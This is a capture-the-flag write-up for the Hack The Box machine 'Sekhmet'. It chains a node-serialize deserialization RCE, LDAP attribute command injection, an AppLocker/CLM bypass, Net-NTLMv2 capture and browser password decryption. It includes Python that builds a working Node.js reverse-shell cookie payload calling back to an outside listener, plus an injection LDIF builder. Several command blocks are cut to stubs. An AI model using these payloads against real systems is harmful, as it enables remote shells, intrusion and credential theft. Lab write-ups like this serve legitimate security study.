Basic information
Port scan
Only 22 and 80 are open:

```bash
nmap -sC -sV -Pn 10.10.11.179
```
80
The site needs a hosts entry:

```
10.10.11.179 www.windcorp.htb
```
Subdomain scan
Fuzzing virtual hosts turns up portal (the 153-byte response is the default page and is filtered out):

```bash
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://www.windcorp.htb/" -H 'Host: FUZZ.windcorp.htb' -fs 153
```
portal
Add a hosts entry for it as well and browse to it:
portal
The usual weak credentials admin:admin log us in; the cookie format and the response headers show the backend is Node.js:
ModSecurity
A few quick test payloads show that ModSecurity sits in front of the application:
shell
Combining a ModSecurity rule-set bypass with the node-serialize deserialization RCE gives code execution:
- ModSecurity Vulnerability & PoC (CVE-2019-19886)
https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/
- Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- Node.Js-Security-Course/nodejsshell.py at master · ajinabraham/Node.Js-Security-Course
https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

```bash
# generate the charcode-encoded Node.js reverse shell for our listener on 10.10.14.6:4444
python2 nodejsshell.py 10.10.14.6 4444
```
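To make the deserialization step concrete, here is an added example (not code from the page, nodejsshell.py or the target) that builds the node-serialize payload the OpSecX reference describes: a JSON value prefixed with node-serialize's `_$$ND_FUNC$$_` marker whose function body is turned into an IIFE by a trailing `()`, so `unserialize()` runs it immediately. The JavaScript is wrapped in `eval(String.fromCharCode(...))` the way nodejsshell.py does, which keeps quotes and keywords out of the body. The cookie name `profile` and the base64-encoded-JSON cookie format are taken from the OpSecX demo application and are assumptions about this target; the listener address is the one used in the page's command.

```python
import base64
import json

# Constructed example values: the listener used in the page's nodejsshell.py call.
LHOST = "10.10.14.6"
LPORT = 4444

FUNC_FLAG = "_$$ND_FUNC$$_"  # node-serialize's marker for a serialized function


def node_reverse_shell_js(host: str, port: int) -> str:
    """Plain Node.js reverse shell using net + child_process (what gets executed)."""
    return (
        'var net=require("net"),cp=require("child_process"),'
        'sh=cp.spawn("/bin/sh",[]);var c=new net.Socket();'
        f'c.connect({port},"{host}",function(){{c.pipe(sh.stdin);'
        'sh.stdout.pipe(c);sh.stderr.pipe(c);});'
    )


def charcode_wrap(js: str) -> str:
    """Encode js as eval(String.fromCharCode(...)); the result contains only
    digits, commas and the eval/String.fromCharCode call, no quotes."""
    codes = ",".join(str(ord(ch)) for ch in js)
    return f"eval(String.fromCharCode({codes}))"


def charcode_unwrap(wrapped: str) -> str:
    """Inverse of charcode_wrap, used to check the payload round-trips."""
    inner = wrapped[len("eval(String.fromCharCode("):-len("))")]
    return "".join(chr(int(n)) for n in inner.split(","))


def node_serialize_payload(js: str, key: str = "rce") -> str:
    """JSON that node-serialize's unserialize() will eval. The trailing '()' makes
    the function an IIFE, so it runs during unserialize without the app ever
    touching the property."""
    obj = {key: f"{FUNC_FLAG}function(){{{js}}}()"}
    return json.dumps(obj)


def cookie_value(payload_json: str) -> str:
    """Base64 form as read from the 'profile' cookie in the OpSecX demo app
    (assumed delivery format for this target)."""
    return base64.b64encode(payload_json.encode()).decode()


def decode_cookie(cookie: str) -> dict:
    """What the server-side unserialize() call would see before evaluating it."""
    return json.loads(base64.b64decode(cookie))


if __name__ == "__main__":
    js = charcode_wrap(node_reverse_shell_js(LHOST, LPORT))
    payload = node_serialize_payload(js)
    print(payload)
    print("Cookie: profile=" + cookie_value(payload))
```

Whatever WAF bypass is needed on top (the page uses a ModSecurity rule-set bypass) is applied to this serialized string at transport time; the deserialization trick itself is unchanged.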
This gives us a shell as the webster user:
backup.zip
The archive's password does not crack directly, but the file listing is readable and shows it contains /etc/passwd. Since the archive uses legacy ZipCrypto (this does not work against AES-encrypted zips), we can run a known-plaintext attack with bkcrack, which needs at least 12 bytes of known plaintext, 8 of them contiguous:
- Brute Force - CheatSheet - HackTricks
https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#known-plaintext-zip-attack

```bash
# create a zip of the passwd file
```
In the extracted /var/lib/sss/db/cache_windcorp.htb.ldb (the sssd credential cache) we find a cached password hash for a domain account; it cracks to pantera:

```
Ray.Duncan@WINDCORP.HTB
```
ray.duncan & user flag
Log in over SSH with the domain account; ray.duncan can escalate to root on the web server:

```bash
ssh 'ray.duncan@windcorp.htb'@10.10.11.179
```

As root on the web server we get the user flag:
Container network scan
Probing the container subnet further, 192.168.0.2 looks like the DC:

```bash
# crude full TCP sweep from inside the container; nc -v reports results on stderr, collected in output.txt
for p in {1..65535}; do nc -vn 192.168.0.2 $p -w 1 -z & done 2> output.txt
```
So we need a tunnel through the web server to talk to the DC:

```
local
```

With proxychains pointed at that tunnel we can reach the DC; here we request a service ticket for CIFS on the DC, which impacket saves as ray.duncan.ccache:

```bash
proxychains4 python3 ~/Tools/impacket/examples/getST.py -dc-ip 192.168.0.2 -spn cifs/hope.windcorp.htb 'windcorp.htb/ray.duncan:pantera'
```
SMB
With the service ticket obtained above, point Kerberos tooling at the ccache and access SMB:

```bash
export KRB5CCNAME=ray.duncan.ccache
```
LDAP
Reference:
On the compromised container, dump the LDAP directory for more information (GSSAPI uses the Kerberos ticket above; -LLL gives plain LDIF output):

```bash
ldapsearch -LLLY GSSAPI -H ldap://windcorp.htb -b 'DC=windcorp,DC=htb' > ldapinfo.txt
```
Command injection
We can modify ray.duncan's own mobile number, and that attribute is consumed by something on the DC that is vulnerable to command injection. Build the payload in the form `mobile: ;<cmd>`:

```bash
# create a mod.ldif
```

Check that the change was applied and wait a while (about 2 minutes) to see the request from hope. Note: the mobile attribute has a length limit (64 characters).
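As an added example (not from the page), this builds the modify LDIF for the `mobile` injection described above and enforces the 64-character limit up front, so a command is rejected locally rather than being refused by the server or silently cut off. The DN is the one the page uses; the `ldapmodify -Y GSSAPI` invocation in the comment is an assumption about how the LDIF is applied, and the staging helper only packages several commands as separate modifications, one per two-minute trigger.

```python
import base64

# From the page: the schema caps 'mobile' at 64 characters and the DC runs
# whatever follows the leading ';' about every two minutes.
MOBILE_MAX_LEN = 64
TARGET_DN = "CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb"


def build_mobile_payload(cmd: str) -> str:
    """Return the ';<cmd>' attribute value, refusing anything over the 64-char limit."""
    value = f";{cmd}"
    if len(value) > MOBILE_MAX_LEN:
        raise ValueError(
            f"payload is {len(value)} chars, mobile allows {MOBILE_MAX_LEN}: {value!r}"
        )
    return value


def ldif_attr(name: str, value: str) -> str:
    """Emit 'name: value', or 'name:: <base64>' where RFC 2849 requires it
    (value starting with space, ':' or '<', or containing non-ASCII/newlines)."""
    unsafe_start = value[:1] in (" ", ":", "<")
    unsafe_body = any(ord(c) > 127 or c in "\r\n\0" for c in value)
    if unsafe_start or unsafe_body:
        return f"{name}:: {base64.b64encode(value.encode()).decode()}"
    return f"{name}: {value}"


def build_mod_ldif(dn: str, cmd: str) -> str:
    """One LDIF change record replacing 'mobile' on dn with the injection payload.
    Apply with something like: ldapmodify -Y GSSAPI -H ldap://windcorp.htb -f mod.ldif
    (assumed invocation, not taken from the page)."""
    return "\n".join([
        f"dn: {dn}",
        "changetype: modify",
        "replace: mobile",
        ldif_attr("mobile", build_mobile_payload(cmd)),
        "-",
        "",
    ])


def build_staged_ldifs(dn: str, cmds: list) -> list:
    """Validate every step before sending any, then return one LDIF per command.
    Each is a separate modify and a separate ~2 minute wait, which is why longer
    payloads are staged (drop a file, then run it) instead of sent in one go."""
    return [build_mod_ldif(dn, c) for c in cmds]


if __name__ == "__main__":
    print(build_mod_ldif(TARGET_DN, "whoami"))
```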
applocker
The target runs AppLocker; we can use an LDIF to have it export the AppLocker policy for us:

```ldif
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
```
Reading the policy, we need a directory that is writable by us and covered by an Allow rule without being on its exception list. Reference:
- World-writable directories in %windir%
https://gist.github.com/mattifestation/5f9de750470c9e0e1f9c9c33f0ec3e56

```xml
<FilePathRule Id="2c47f772-4d79-4493-b64b-613e17f0011c" Name="All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow">
```
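The check described above, as an added example that is not part of the page: parse an AppLocker policy export, collect the path rules with their conditions and exceptions, and intersect them with a list of world-writable directories. The policy XML below is constructed for the example around the rule quoted on the page; its two exceptions (Temp and Tasks) are hypothetical, and the writable directories are a subset of those in the referenced gist, to be verified against the gist and with icacls on the target. Only FilePathRule evaluation is modelled; publisher and hash rules, and the UserOrGroupSid check, are out of scope.

```python
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# Constructed sample policy: the rule quoted on the page plus two hypothetical
# exceptions. On the target, export the real one with
# Get-AppLockerPolicy -Effective -Xml and feed that in instead.
SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="2c47f772-4d79-4493-b64b-613e17f0011c" Name="All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\*" />
      </Conditions>
      <Exceptions>
        <FilePathCondition Path="%WINDIR%\Temp\*" />
        <FilePathCondition Path="%WINDIR%\Tasks\*" />
      </Exceptions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

# Subset of the world-writable directories from the referenced gist (assumed list;
# confirm with icacls on the target).
WRITABLE_DIRS = [
    r"C:\Windows\Tasks",
    r"C:\Windows\Temp",
    r"C:\Windows\tracing",
    r"C:\Windows\Registration\CRMLog",
    r"C:\Windows\System32\spool\drivers\color",
    r"C:\Windows\debug\WIA",
]

# AppLocker path variables; the sample only needs %WINDIR%.
PATH_VARS = {
    "%WINDIR%": r"C:\Windows",
    "%SYSTEM32%": r"C:\Windows\System32",
    "%PROGRAMFILES%": r"C:\Program Files",
    "%OSDRIVE%": "C:",
}


def expand(pattern: str) -> str:
    for var, real in PATH_VARS.items():
        pattern = pattern.replace(var, real)
    return pattern


def path_matches(pattern: str, path: str) -> bool:
    # AppLocker paths are case-insensitive; fnmatch's '*' spans backslashes too.
    return fnmatchcase(path.lower(), expand(pattern).lower())


def parse_path_rules(policy_xml: str, collection: str = "Exe") -> list:
    """FilePathRules of one RuleCollection with their conditions and exceptions."""
    rules = []
    for coll in ET.fromstring(policy_xml).iter("RuleCollection"):
        if coll.get("Type") != collection:
            continue
        for rule in coll.findall("FilePathRule"):
            rules.append({
                "name": rule.get("Name"),
                "action": rule.get("Action"),
                "sid": rule.get("UserOrGroupSid"),
                "conditions": [c.get("Path") for c in rule.findall("Conditions/FilePathCondition")],
                "exceptions": [c.get("Path") for c in rule.findall("Exceptions/FilePathCondition")],
            })
    return rules


def is_allowed(path: str, rules: list) -> bool:
    """An explicit Deny wins; otherwise the file must hit an Allow rule's
    condition and none of that rule's exceptions."""
    allowed = False
    for rule in rules:
        hit = any(path_matches(c, path) for c in rule["conditions"]) and not any(
            path_matches(e, path) for e in rule["exceptions"]
        )
        if not hit:
            continue
        if rule["action"] == "Deny":
            return False
        allowed = True
    return allowed


def usable_drop_dirs(candidates: list, rules: list) -> list:
    """Writable directories from which an .exe would be allowed to run."""
    return [d for d in candidates if is_allowed(d + r"\payload.exe", rules)]


if __name__ == "__main__":
    for d in usable_drop_dirs(WRITABLE_DIRS, parse_path_rules(SAMPLE_POLICY)):
        print("writable and allowed:", d)
```

With the sample policy this leaves C:\Windows\debug\WIA in the list, which is where the page later runs hbd.exe from.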
The other thing we need is a way out of PowerShell Constrained Language Mode (CLM), which AppLocker script enforcement puts us in; the runspace technique below, compiled into a binary, does that:
- Powershell CLM Bypass Using Runspaces
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
scriptrunner
After compiling it, trigger execution through the LDAP injection again and we get a shell on the DC as scriptrunner:

```bash
# upload the bypass code
```
Information
Running winPEAS shows NTLMv2 is in use, so we can capture a Net-NTLMv2 response by forcing the DC to authenticate to a rogue SMB server (impacket's smbserver.py):

```bash
# on webserver
```
Use the following LDIF to make the DC connect to our fake SMB server:

```ldif
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
```
Wait for the trigger, capture the hash and crack it:

```
[*] scriptrunner::WINDCORP:aaaaaaaaaaaaaaaa:7fac7b077275dce97d19f843ee6abffd:...
```
bob.wood
The cracked password is also bob.wood's password (password reuse); use PowerShell to run commands as him:

```powershell
$SecPassword = ConvertTo-SecureString '!@p%i&J#iNNo1T2' -AsPlainText -Force
```
Upload SharpHound and collect again: bob.wood appears to be a member of IT and has PSRemote rights to the DC. However, we need a domain admin (e.g. bob.woodadm) to get the root flag. It is reasonable to assume that bob.wood uses the same machine to log in as bob.woodadm for administrative work, so searching his browser data may turn up something useful.
bob.woodadm
Credentials are saved in Edge, here: C:\users\bob.wood\appdata\local\microsoft\edge\user data\default\Login Data
Use this tool to decrypt the passwords (run from a writable directory that AppLocker still allows, here C:\windows\debug\wia):
- moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. A browser data export and decryption tool that runs on all platforms.
https://github.com/moonD4rk/HackBrowserData

```powershell
PS C:\windows\debug\wia> .\hbd.exe
```
bob.woodADM
Now log in as bob.woodadm and grab the root flag:

```powershell
$SecPassword = ConvertTo-SecureString 'smeT-Worg-wer-m024' -AsPlainText -Force
```
References
- ModSecurity Vulnerability & PoC (CVE-2019-19886)
https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/
- Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- Node.Js-Security-Course/nodejsshell.py at master · ajinabraham/Node.Js-Security-Course
https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
- Brute Force - CheatSheet - HackTricks
https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#known-plaintext-zip-attack
- MS ADV190023
https://gist.github.com/tscherf/a0be193fe7bd603bbe1f511f9a00e737
- World-writable directories in %windir%
https://gist.github.com/mattifestation/5f9de750470c9e0e1f9c9c33f0ec3e56
- Powershell CLM Bypass Using Runspaces
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
- ropnop/impacket_static_binaries
https://github.com/ropnop/impacket_static_binaries/releases
- moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. A browser data export and decryption tool that runs on all platforms.
https://github.com/moonD4rk/HackBrowserData
- Sekhmet - HTB [Discussion] | BreachForums
https://breached.vc/Thread-Sekhmet-HTB-Discussion
- HTB - Sekhmet [Insane] // MeowMeowAttack's security.log
https://meowmeowattack.github.io/htb/sekhmet/